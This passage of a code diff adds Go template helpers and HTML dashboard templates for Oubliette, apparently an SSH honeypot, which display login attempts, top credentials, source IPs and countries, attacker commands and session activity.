|
||||||
|
func templateFuncMap() template.FuncMap {
|
||||||
|
return template.FuncMap{
|
||||||
|
"formatTime": func(t time.Time) string {
|
||||||
|
return t.Format("2006-01-02 15:04:05 UTC")
|
||||||
|
},
|
||||||
|
"truncateID": func(id string) string {
|
||||||
|
if len(id) > 8 {
|
||||||
|
return id[:8]
|
||||||
|
}
|
||||||
|
return id
|
||||||
|
},
|
||||||
|
"derefTime": func(t *time.Time) time.Time {
|
||||||
|
if t == nil {
|
||||||
|
return time.Time{}
|
||||||
|
}
|
||||||
|
return *t
|
||||||
|
},
|
||||||
|
"derefFloat": func(f *float64) float64 {
|
||||||
|
if f == nil {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
return *f
|
||||||
|
},
|
||||||
|
"formatScore": func(f *float64) string {
|
||||||
|
if f == nil {
|
||||||
|
return "-"
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%.0f%%", *f*100)
|
||||||
|
},
|
||||||
|
"derefString": func(s *string) string {
|
||||||
|
if s == nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
return *s
|
||||||
|
},
|
||||||
|
"truncateCommand": func(s string) string {
|
||||||
|
if len(s) > 50 {
|
||||||
|
return s[:50] + "..."
|
||||||
|
}
|
||||||
|
return s
|
||||||
|
},
|
||||||
|
"formatBytes": func(b int64) string {
|
||||||
|
const (
|
||||||
|
kb = 1024
|
||||||
|
mb = 1024 * kb
|
||||||
|
)
|
||||||
|
switch {
|
||||||
|
case b >= mb:
|
||||||
|
return fmt.Sprintf("%.1f MB", float64(b)/float64(mb))
|
||||||
|
case b >= kb:
|
||||||
|
return fmt.Sprintf("%.1f KB", float64(b)/float64(kb))
|
||||||
|
default:
|
||||||
|
return fmt.Sprintf("%d B", b)
|
||||||
|
}
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func loadTemplates() (*templateSet, error) {
|
||||||
|
funcMap := templateFuncMap()
|
||||||
|
|
||||||
|
dashboard, err := template.New("").Funcs(funcMap).ParseFS(templateFS,
|
||||||
|
"templates/layout.html",
|
||||||
|
"templates/dashboard.html",
|
||||||
|
"templates/fragments/stats.html",
|
||||||
|
"templates/fragments/active_sessions.html",
|
||||||
|
"templates/fragments/recent_sessions.html",
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("parsing dashboard templates: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sessionDetail, err := template.New("").Funcs(funcMap).ParseFS(templateFS,
|
||||||
|
"templates/layout.html",
|
||||||
|
"templates/session_detail.html",
|
||||||
|
)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("parsing session detail templates: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return &templateSet{
|
||||||
|
dashboard: dashboard,
|
||||||
|
sessionDetail: sessionDetail,
|
||||||
|
}, nil
|
||||||
|
}
|
||||||
166
internal/web/templates/dashboard.html
Normal file
166
internal/web/templates/dashboard.html
Normal file
@@ -0,0 +1,166 @@
|
|||||||
|
{{define "content"}}
|
||||||
|
<section id="stats-section" hx-get="/fragments/stats" hx-trigger="every 30s" hx-swap="innerHTML">
|
||||||
|
{{template "stats" .Stats}}
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<details>
|
||||||
|
<summary>Filters</summary>
|
||||||
|
<form id="filter-form">
|
||||||
|
<div class="grid">
|
||||||
|
<label>Since <input type="date" name="since"></label>
|
||||||
|
<label>Until <input type="date" name="until"></label>
|
||||||
|
<label>IP <input type="text" name="ip" placeholder="10.0.0.1"></label>
|
||||||
|
<label>Country <input type="text" name="country" placeholder="CN" maxlength="2"></label>
|
||||||
|
<label>Username <input type="text" name="username" placeholder="root"></label>
|
||||||
|
</div>
|
||||||
|
<div class="grid">
|
||||||
|
<label><input type="checkbox" name="human_score" value="1"> Human score > 0</label>
|
||||||
|
<label>Sort by <select name="sort"><option value="connected_at">Recent</option><option value="input_bytes">Input Bytes</option></select></label>
|
||||||
|
</div>
|
||||||
|
<button type="submit">Apply</button>
|
||||||
|
<button type="button" class="secondary" onclick="clearFilters()">Clear</button>
|
||||||
|
</form>
|
||||||
|
</details>
|
||||||
|
|
||||||
|
<section>
|
||||||
|
<h3>Attack Trends</h3>
|
||||||
|
<div class="grid">
|
||||||
|
<article>
|
||||||
|
<header>Attempts Over Time</header>
|
||||||
|
<canvas id="chart-attempts"></canvas>
|
||||||
|
</article>
|
||||||
|
<article>
|
||||||
|
<header>Hourly Pattern (UTC)</header>
|
||||||
|
<canvas id="chart-hourly"></canvas>
|
||||||
|
</article>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<section>
|
||||||
|
<h3>Attack Origins</h3>
|
||||||
|
<article>
|
||||||
|
<div id="world-map"></div>
|
||||||
|
</article>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<div id="dashboard-content">
|
||||||
|
{{template "dashboard_content" .}}
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<section>
|
||||||
|
<h3>Active Sessions</h3>
|
||||||
|
<div id="active-sessions" hx-get="/fragments/active-sessions" hx-trigger="every 10s" hx-swap="innerHTML">
|
||||||
|
{{template "active_sessions" .ActiveSessions}}
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
|
||||||
|
<section>
|
||||||
|
<h3>Recent Sessions</h3>
|
||||||
|
<table id="recent-sessions-table">
|
||||||
|
<thead>
|
||||||
|
<tr>
|
||||||
|
<th>ID</th>
|
||||||
|
<th>IP</th>
|
||||||
|
<th>Country</th>
|
||||||
|
<th>Username</th>
|
||||||
|
<th>Type</th>
|
||||||
|
<th>Score</th>
|
||||||
|
<th>Input</th>
|
||||||
|
<th>Connected</th>
|
||||||
|
<th>Disconnected</th>
|
||||||
|
</tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{template "recent_sessions" .RecentSessions}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</section>
|
||||||
|
{{end}}
|
||||||
|
|
||||||
|
{{define "scripts"}}
|
||||||
|
<script src="/static/chart.min.js"></script>
|
||||||
|
<script src="/static/dashboard.js"></script>
|
||||||
|
{{end}}
|
||||||
|
|
||||||
|
{{define "dashboard_content"}}
|
||||||
|
<section>
|
||||||
|
<h3>Top Credentials & IPs</h3>
|
||||||
|
<div class="top-grid">
|
||||||
|
<article>
|
||||||
|
<header>Top Usernames</header>
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr><th>Username</th><th>Attempts</th></tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .TopUsernames}}
|
||||||
|
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="2">No data</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</article>
|
||||||
|
<article>
|
||||||
|
<header>Top Passwords</header>
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr><th>Password</th><th>Attempts</th></tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .TopPasswords}}
|
||||||
|
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="2">No data</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</article>
|
||||||
|
<article>
|
||||||
|
<header>Top IPs</header>
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr><th>IP</th><th>Country</th><th>Attempts</th></tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .TopIPs}}
|
||||||
|
<tr><td>{{.Value}}</td><td>{{.Country}}</td><td>{{.Count}}</td></tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="3">No data</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</article>
|
||||||
|
<article>
|
||||||
|
<header>Top Countries</header>
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr><th>Country</th><th>Attempts</th></tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .TopCountries}}
|
||||||
|
<tr><td>{{.Value}}</td><td>{{.Count}}</td></tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="2">No data</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</article>
|
||||||
|
<article>
|
||||||
|
<header>Top Exec Commands</header>
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr><th>Command</th><th>Count</th></tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .TopExecCommands}}
|
||||||
|
<tr><td><code>{{truncateCommand .Value}}</code></td><td>{{.Count}}</td></tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="2">No data</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
</article>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
{{end}}
|
||||||
32
internal/web/templates/fragments/active_sessions.html
Normal file
32
internal/web/templates/fragments/active_sessions.html
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
{{define "active_sessions"}}
|
||||||
|
<table>
|
||||||
|
<thead>
|
||||||
|
<tr>
|
||||||
|
<th>ID</th>
|
||||||
|
<th>IP</th>
|
||||||
|
<th>Country</th>
|
||||||
|
<th>Username</th>
|
||||||
|
<th>Type</th>
|
||||||
|
<th>Score</th>
|
||||||
|
<th>Input</th>
|
||||||
|
<th>Connected</th>
|
||||||
|
</tr>
|
||||||
|
</thead>
|
||||||
|
<tbody>
|
||||||
|
{{range .}}
|
||||||
|
<tr>
|
||||||
|
<td><a href="/sessions/{{.ID}}"><code>{{truncateID .ID}}</code></a>{{if gt .EventCount 0}} <mark>replay</mark>{{end}}</td>
|
||||||
|
<td>{{.IP}}</td>
|
||||||
|
<td>{{.Country}}</td>
|
||||||
|
<td>{{.Username}}</td>
|
||||||
|
<td>{{if .ExecCommand}}<mark>exec</mark>{{else}}{{.ShellName}}{{end}}</td>
|
||||||
|
<td>{{if .HumanScore}}{{if gt (derefFloat .HumanScore) 0.6}}<mark>{{formatScore .HumanScore}}</mark>{{else}}{{formatScore .HumanScore}}{{end}}{{else}}-{{end}}</td>
|
||||||
|
<td>{{formatBytes .InputBytes}}</td>
|
||||||
|
<td>{{formatTime .ConnectedAt}}</td>
|
||||||
|
</tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="8">No active sessions</td></tr>
|
||||||
|
{{end}}
|
||||||
|
</tbody>
|
||||||
|
</table>
|
||||||
|
{{end}}
|
||||||
17
internal/web/templates/fragments/recent_sessions.html
Normal file
17
internal/web/templates/fragments/recent_sessions.html
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
{{define "recent_sessions"}}
|
||||||
|
{{range .}}
|
||||||
|
<tr>
|
||||||
|
<td><a href="/sessions/{{.ID}}"><code>{{truncateID .ID}}</code></a>{{if gt .EventCount 0}} <mark>replay</mark>{{end}}</td>
|
||||||
|
<td>{{.IP}}</td>
|
||||||
|
<td>{{.Country}}</td>
|
||||||
|
<td>{{.Username}}</td>
|
||||||
|
<td>{{if .ExecCommand}}<mark>exec</mark>{{else}}{{.ShellName}}{{end}}</td>
|
||||||
|
<td>{{if .HumanScore}}{{if gt (derefFloat .HumanScore) 0.6}}<mark>{{formatScore .HumanScore}}</mark>{{else}}{{formatScore .HumanScore}}{{end}}{{else}}-{{end}}</td>
|
||||||
|
<td>{{formatBytes .InputBytes}}</td>
|
||||||
|
<td>{{formatTime .ConnectedAt}}</td>
|
||||||
|
<td>{{if .DisconnectedAt}}{{formatTime (derefTime .DisconnectedAt)}}{{else}}<mark>active</mark>{{end}}</td>
|
||||||
|
</tr>
|
||||||
|
{{else}}
|
||||||
|
<tr><td colspan="9">No sessions</td></tr>
|
||||||
|
{{end}}
|
||||||
|
{{end}}
|
||||||
20
internal/web/templates/fragments/stats.html
Normal file
20
internal/web/templates/fragments/stats.html
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
{{define "stats"}}
|
||||||
|
<div class="stats-grid">
|
||||||
|
<article class="stat-card">
|
||||||
|
<h2>{{.TotalAttempts}}</h2>
|
||||||
|
<p>Total Attempts</p>
|
||||||
|
</article>
|
||||||
|
<article class="stat-card">
|
||||||
|
<h2>{{.UniqueIPs}}</h2>
|
||||||
|
<p>Unique IPs</p>
|
||||||
|
</article>
|
||||||
|
<article class="stat-card">
|
||||||
|
<h2>{{.TotalSessions}}</h2>
|
||||||
|
<p>Total Sessions</p>
|
||||||
|
</article>
|
||||||
|
<article class="stat-card">
|
||||||
|
<h2>{{.ActiveSessions}}</h2>
|
||||||
|
<p>Active Sessions</p>
|
||||||
|
</article>
|
||||||
|
</div>
|
||||||
|
{{end}}
|
||||||
64
internal/web/templates/layout.html
Normal file
64
internal/web/templates/layout.html
Normal file
@@ -0,0 +1,64 @@
|
|||||||
|
<!DOCTYPE html>
|
||||||
|
<html lang="en" data-theme="dark">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||||
|
<title>Oubliette</title>
|
||||||
|
<link rel="stylesheet" href="/static/pico.min.css">
|
||||||
|
<script src="/static/htmx.min.js"></script>
|
||||||
|
<style>
|
||||||
|
:root {
|
||||||
|
--pico-font-size: 16px;
|
||||||
|
}
|
||||||
|
.stats-grid {
|
||||||
|
display: grid;
|
||||||
|
grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));
|
||||||
|
gap: 1rem;
|
||||||
|
}
|
||||||
|
.stat-card {
|
||||||
|
text-align: center;
|
||||||
|
padding: 1rem;
|
||||||
|
}
|
||||||
|
.stat-card h2 {
|
||||||
|
margin-bottom: 0.25rem;
|
||||||
|
font-size: 2rem;
|
||||||
|
}
|
||||||
|
.stat-card p {
|
||||||
|
margin: 0;
|
||||||
|
color: var(--pico-muted-color);
|
||||||
|
}
|
||||||
|
.top-grid {
|
||||||
|
display: grid;
|
||||||
|
grid-template-columns: repeat(auto-fit, minmax(380px, 1fr));
|
||||||
|
gap: 1rem;
|
||||||
|
}
|
||||||
|
.top-grid article {
|
||||||
|
overflow: hidden;
|
||||||
|
min-width: 0;
|
||||||
|
}
|
||||||
|
#world-map svg { width: 100%; height: auto; }
|
||||||
|
#world-map svg path { fill: #2a2a3e; stroke: #555; stroke-width: 0.5; transition: fill 0.2s; }
|
||||||
|
#world-map svg path:hover, #world-map svg g:hover path { stroke: #fff; stroke-width: 1; }
|
||||||
|
nav h1 {
|
||||||
|
margin: 0;
|
||||||
|
}
|
||||||
|
nav small {
|
||||||
|
color: var(--pico-muted-color);
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<nav class="container">
|
||||||
|
<ul>
|
||||||
|
<li><h1>Oubliette</h1></li>
|
||||||
|
</ul>
|
||||||
|
<ul>
|
||||||
|
<li><small>SSH Honeypot Dashboard</small></li>
|
||||||
|
</ul>
|
||||||
|
</nav>
|
||||||
|
<main class="container">
|
||||||
|
{{block "content" .}}{{end}}
|
||||||
|
</main>
|
||||||
|
{{block "scripts" .}}{{end}}
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user